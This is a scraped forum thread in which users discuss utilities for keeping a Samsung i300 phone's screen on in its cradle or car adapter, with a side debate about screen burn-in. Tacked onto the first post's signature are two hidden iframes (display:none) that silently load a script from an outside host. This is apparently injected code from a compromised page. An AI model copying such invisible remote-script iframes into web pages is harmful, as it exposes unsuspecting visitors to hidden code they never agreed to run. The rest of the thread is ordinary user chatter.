+ Reply to Thread
    Beams from above...

Screen-on utility?

Anybody got a utility that will allow the screen to stay on when the phone is in the cradle or car adapter?

I tried OnCradleOn, but it doesn't seem to work.

John<iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>
    <iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>

Administrator

Arrow

pastor,

as ive stated before, i think this its best that we cant do this as the screen could be prone to "image burn in" and also the life of the screen would be greatly affected as its not your standard LCD screen. just my opinion though.

Beams from above...
    Aahhh...

That's a shame, because it would be nice to have the display stay on in the car (once the kit becomes available).

What makes this screen different than that of a laptop computer?

John

i300 User
    I thought only CRT displays got screen burns - not LCDs (no tubes)?

Administrator

Arrow

this scren will endure some burn in , although not as much as it seems im saying.. it will shorten its life if the screen is left on always..

if it was not an issue, samsung would have had that as an option on the phone.. this if my opinion though, as i have stated, but who knows what samsung was totally thinking when they made this contraption..

Re: Screen-on utility?

Originally posted by Pastor John
    Anybody got a utility that will allow the screen to stay on when the phone is in the cradle or car adapter?

I tried OnCradleOn, but it doesn't seem to work.

John
    Pastor:
    Where did you find OnCradleOn? What does it do (or not do) when you install it? I also would like the phone to stay on while I am in the car and have the car adapter plugged in. My 6035 did this very nicely.
    Carl

i300 User
    Ilium Software has something new called "DockWare" that works on the I300 and does what you guys are looking for.

http://www.iliumsoft.com

gf

Beams from above...
    Here's where I found the OnCradleOn utility, but I never could get it to work.

John

OnCradleOn Link

Glen-

I tried "DockWare" the free version. It does not keep my i300's screen on when it is in the cradle. I double checked to make sure I have the "Stay On In Cradle" checkbox selected.

Does this product work for you? Do you use the free or pro version? Do I need to do anything else?

Thanks.

Does "in the cradle" also mean hooked to the car power adapter?
    Carl

i300 User
    Don't know - you'd have to try it I guess. Please post your findings if you try it for others - I didn't keep the software - really no use for me.

gf